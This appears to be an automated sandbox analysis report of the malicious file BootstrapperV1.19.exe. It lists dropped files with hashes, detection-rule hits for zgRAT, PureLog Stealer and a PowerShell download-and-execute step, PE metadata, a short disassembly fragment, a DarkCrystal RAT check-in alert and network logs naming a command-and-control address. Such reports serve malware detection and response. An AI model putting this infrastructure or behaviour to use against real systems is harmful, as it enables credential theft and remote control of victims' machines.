                                                    SHA-512:5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\ELAMBKUP\SIHClient.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\ELAMBKUP\SIHClient.exe, Author: Joe Security
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.465759658778501
                                                    Encrypted:false
                                                    SSDEEP:6144:FIXfpi67eLPU9skLmb0b4WWSPKaJG8nAgejZMMhA2gX4WABl0uN0dwBCswSb6:mXD94WWlLZMM6YFHm+6
                                                    MD5:48ED625AF3CF0CD3D902FA61F38A10F8
                                                    SHA1:DFEC2BC4C3097426D9EF7E6878C0AF04F9677345
                                                    SHA-256:89671CBE4CF2E6BE10E36092F551F280A8D7B1648B07E3887FDD0ADFB27B8877
                                                    SHA-512:7AAD458F42E2CA9A2444407D5E2E1E3FA392BD4AA11FAB1DA21E2B57CF59D09D5B62B98763295DCF814922CB1DEC04F1AA0588A03E451DC7B65EF04FB84B7622
                                                    Malicious:false
                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...'............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    File Type:ISO-8859 text, with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):571
                                                    Entropy (8bit):4.9398118662542965
                                                    Encrypted:false
                                                    SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
                                                    MD5:5294778E41EE83E1F1E78B56466AD690
                                                    SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
                                                    SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
                                                    SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
                                                    Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).
                                                    Process:C:\Windows\System32\w32tm.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):151
                                                    Entropy (8bit):4.76476480419232
                                                    Encrypted:false
                                                    SSDEEP:3:VLV993J+miJWEoJ8FXUMpvVsSbv2SLy6vpfZGKvj:Vx993DEU9MpOiv2up
                                                    MD5:F0FA1B17316A4A1096F9914C24C66901
                                                    SHA1:B58AB4FAFD068FD98377BD0A31A768341F85DE73
                                                    SHA-256:AB6C50FB8B6E8D9EE8512323A4A3B34382C88D5776CADE4C986D4237CC2C3489
                                                    SHA-512:C9CA0C8099C13FAD631ACE82FC33C0BF8AA1375FEDF142915FF3E88C3571CFE0DE6F51E9987FEAD6C9C7EC490AE1B6B3671608F44DE861260134849918CFB4D2
                                                    Malicious:false
                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 14/09/2024 08:02:17..08:02:17, error: 0x80072746.08:02:22, error: 0x80072746.
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.037500694183959
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • InstallShield setup (43055/19) 0.21%
                                                    • Win32 Executable Delphi generic (14689/80) 0.07%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    File name:BootstrapperV1.19.exe
                                                    File size:3'247'616 bytes
                                                    MD5:c9d720a4200df5064f655adc3656056f
                                                    SHA1:0dc179cfc3cf564ea1e9c85e012ac9bda3b40464
                                                    SHA256:9cd19cf01e1d8c64caa0dffcd07dfb3304fc7257a1c468c0f3d4df1ad696319f
                                                    SHA512:f0628313d0bccdd94795d649f1f6eda194b97fe991fb1755d9525cf944b310569a6dc0a155caf17dc4e49fda4c5eaf42063443bb67abc19a079f934570136852
                                                    SSDEEP:49152:ivotkNjg/lhqZvGyBJa+U5kzXDFrO0iTb0bzveEX99h:i5ZvGko+U8XBgseE5
                                                    TLSH:7FE5BF123BE1DE33C27D1771E4A2163953B8E6617662EB0F2A0D19D55C133E18E263BB
                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                    Icon Hash:90cececece8e8eb0
                                                    Entrypoint:0x4020cc
                                                    Entrypoint Section:CODE
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                    DLL Characteristics:
                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:d59a4a699610169663a929d37c90be43
                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    mov ecx, 0000000Ch
                                                    push 00000000h
                                                    push 00000000h
                                                    dec ecx
                                                    jne 00007F7B7508896Bh
                                                    push ecx
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    mov eax, 0040209Ch
                                                    call 00007F7B750883E0h
                                                    xor eax, eax
                                                    push ebp
                                                    push 00402361h
                                                    push dword ptr fs:[eax]
                                                    mov dword ptr fs:[eax], esp
                                                    lea edx, dword ptr [ebp-14h]
                                                    mov eax, 00402378h
                                                    call 00007F7B750887B9h
                                                    mov eax, dword ptr [ebp-14h]
                                                    call 00007F7B75088889h
                                                    mov edi, eax
                                                    test edi, edi
                                                    jng 00007F7B75088BA6h
                                                    mov ebx, 00000001h
                                                    lea edx, dword ptr [ebp-20h]
                                                    mov eax, ebx
                                                    call 00007F7B75088848h
                                                    mov ecx, dword ptr [ebp-20h]
                                                    lea eax, dword ptr [ebp-1Ch]
                                                    mov edx, 00402384h
                                                    call 00007F7B75087FD8h
                                                    mov eax, dword ptr [ebp-1Ch]
                                                    lea edx, dword ptr [ebp-18h]
                                                    call 00007F7B7508877Dh
                                                    mov edx, dword ptr [ebp-18h]
                                                    mov eax, 00404680h
                                                    call 00007F7B75087EB0h
                                                    lea edx, dword ptr [ebp-2Ch]
                                                    mov eax, ebx
                                                    call 00007F7B75088816h
                                                    mov ecx, dword ptr [ebp-2Ch]
                                                    lea eax, dword ptr [ebp-28h]
                                                    mov edx, 00402390h
                                                    call 00007F7B75087FA6h
                                                    mov eax, dword ptr [ebp-28h]
                                                    lea edx, dword ptr [ebp-24h]
                                                    call 00007F7B7508874Bh
                                                    mov edx, dword ptr [ebp-24h]
                                                    mov eax, 00404684h
                                                    call 00007F7B75087E7Eh
                                                    lea edx, dword ptr [ebp-38h]
                                                    mov eax, ebx
                                                    call 00007F7B750887E4h
                                                    mov ecx, dword ptr [ebp-38h]
                                                    lea eax, dword ptr [ebp-34h]
                                                    mov edx, 0040239Ch
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x316a18.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x70000x18.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                    .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                    .rsrc0x90000x316a180x316c005b26b135edb6e73e512dc9a0c858f46funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_RCDATA0x92940xf3200PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows0.3470135764781491
                                                    RT_RCDATA0xfc4940x2234f9PE32 executable (GUI) Intel 80386, for MS Windows0.48017215728759766
                                                    RT_RCDATA0x31f9900x15ASCII text, with no line terminators1.380952380952381
                                                    RT_RCDATA0x31f9a80x12ASCII text, with no line terminators1.3333333333333333
                                                    RT_RCDATA0x31f9bc0x1very short file (no magic)9.0
                                                    RT_RCDATA0x31f9c00x1very short file (no magic)9.0
                                                    RT_RCDATA0x31f9c40x1very short file (no magic)9.0
                                                    RT_RCDATA0x31f9c80x1very short file (no magic)9.0
                                                    RT_RCDATA0x31f9cc0x10data1.5
                                                    RT_RCDATA0x31f9dc0x1very short file (no magic)9.0
                                                    RT_RCDATA0x31f9e00x38data1.0714285714285714
                                                    DLLImport
                                                    kernel32.dllGetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                                    kernel32.dllWriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                                    shfolder.dllSHGetFolderPathA
                                                    shell32.dllShellExecuteA
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-09-14T12:53:05.144390+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46276180.211.144.15680TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 14, 2024 12:52:04.116233110 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:04.116339922 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:04.116410017 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:04.530397892 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:04.530458927 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.022922039 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.023000956 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.027544022 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.027573109 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.028090000 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.071428061 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.093449116 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.139421940 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.195836067 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.195949078 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.195993900 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.196024895 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.196167946 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.196208000 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.196221113 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.196336031 CEST44349730172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.196398973 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.214947939 CEST49730443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.343769073 CEST49731443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.343859911 CEST44349731172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.343965054 CEST49731443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.344383955 CEST49731443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.344451904 CEST44349731172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.814855099 CEST44349731172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.817413092 CEST49731443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.817508936 CEST44349731172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.984344006 CEST44349731172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.984581947 CEST44349731172.67.203.125192.168.2.4
                                                    Sep 14, 2024 12:52:05.984653950 CEST49731443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:05.985157967 CEST49731443192.168.2.4172.67.203.125
                                                    Sep 14, 2024 12:52:08.051495075 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:08.051533937 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.051588058 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:08.053054094 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:08.053070068 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.550093889 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.550179005 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:08.552803993 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:08.552809954 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.553203106 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.554126024 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:08.595448971 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.702208996 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.702430964 CEST44349733104.20.3.235192.168.2.4
                                                    Sep 14, 2024 12:52:08.702488899 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:08.702763081 CEST49733443192.168.2.4104.20.3.235
                                                    Sep 14, 2024 12:52:09.011667967 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:09.011755943 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:09.011853933 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:09.012193918 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:09.012228966 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:09.748704910 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:09.749041080 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:09.750436068 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:09.750467062 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:09.750987053 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:09.751871109 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:09.795449018 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:10.214063883 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:10.214232922 CEST44349734128.116.123.4192.168.2.4
                                                    Sep 14, 2024 12:52:10.214303017 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:10.214562893 CEST49734443192.168.2.4128.116.123.4
                                                    Sep 14, 2024 12:52:11.881218910 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:52:11.881295919 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:11.881386995 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:52:11.881712914 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:52:11.881751060 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:12.380387068 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:12.380511045 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:52:12.382168055 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:52:12.382200956 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:12.382699966 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:12.383600950 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:52:12.427434921 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:12.541488886 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:12.541729927 CEST44349735104.20.23.46192.168.2.4
                                                    Sep 14, 2024 12:52:12.541805983 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:52:12.542076111 CEST49735443192.168.2.4104.20.23.46
                                                    Sep 14, 2024 12:53:04.337290049 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:04.342165947 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:04.342293978 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:04.342627048 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:04.347454071 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:04.697323084 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:04.702300072 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.144176006 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.144197941 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.144207954 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.144213915 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.144390106 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:05.226886988 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:05.234030962 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.442635059 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.442964077 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:05.448898077 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.729765892 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:05.889813900 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.113933086 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.114686012 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.119281054 CEST806276180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.119348049 CEST6276180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.119524002 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.119592905 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.119715929 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.124573946 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.202866077 CEST6276380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.207746983 CEST806276380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.207932949 CEST6276380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.207932949 CEST6276380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.212794065 CEST806276380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.478322983 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.483673096 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.483692884 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.556240082 CEST6276380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.561261892 CEST806276380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.813839912 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.883064985 CEST806276380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:07.915340900 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:07.949826002 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:08.014039040 CEST806276380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:08.014106989 CEST6276380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.102853060 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.146605968 CEST6276680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.150432110 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.150578976 CEST6276380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.333759069 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:08.333828926 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.335558891 CEST806276680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:08.335629940 CEST6276680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.335813999 CEST6276680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.336235046 CEST806276280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:08.336265087 CEST806276380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:08.336323977 CEST6276280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.336361885 CEST6276380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.340646029 CEST806276680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:08.681015968 CEST6276680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:08.689666986 CEST806276680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:09.009130001 CEST806276680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:09.071568012 CEST6276680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:09.140309095 CEST806276680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:09.140636921 CEST6276680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:09.145839930 CEST806276680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:09.145915985 CEST6276680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:10.172640085 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:10.177767038 CEST806276880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:10.177862883 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:10.178189039 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:10.183466911 CEST806276880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:10.524940968 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:10.532854080 CEST806276880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:10.862967014 CEST806276880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:10.915349960 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:11.060072899 CEST806276880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:11.102844954 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:12.964961052 CEST6276980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:12.964968920 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:13.415352106 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:13.676683903 CEST806276980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:13.676752090 CEST806276880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:13.676949024 CEST6276980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:13.677635908 CEST806276880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:13.677700996 CEST6276980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:13.677784920 CEST6276880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:13.682549953 CEST806276980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.024821997 CEST6276980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:14.030047894 CEST806276980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.030083895 CEST806276980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.264869928 CEST6277080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:14.269946098 CEST806277080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.270015955 CEST6277080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:14.270376921 CEST6277080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:14.275604963 CEST806277080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.359977961 CEST806276980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.492069960 CEST806276980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.492134094 CEST6276980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:14.618558884 CEST6277080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:14.623543024 CEST806277080.211.144.156192.168.2.4
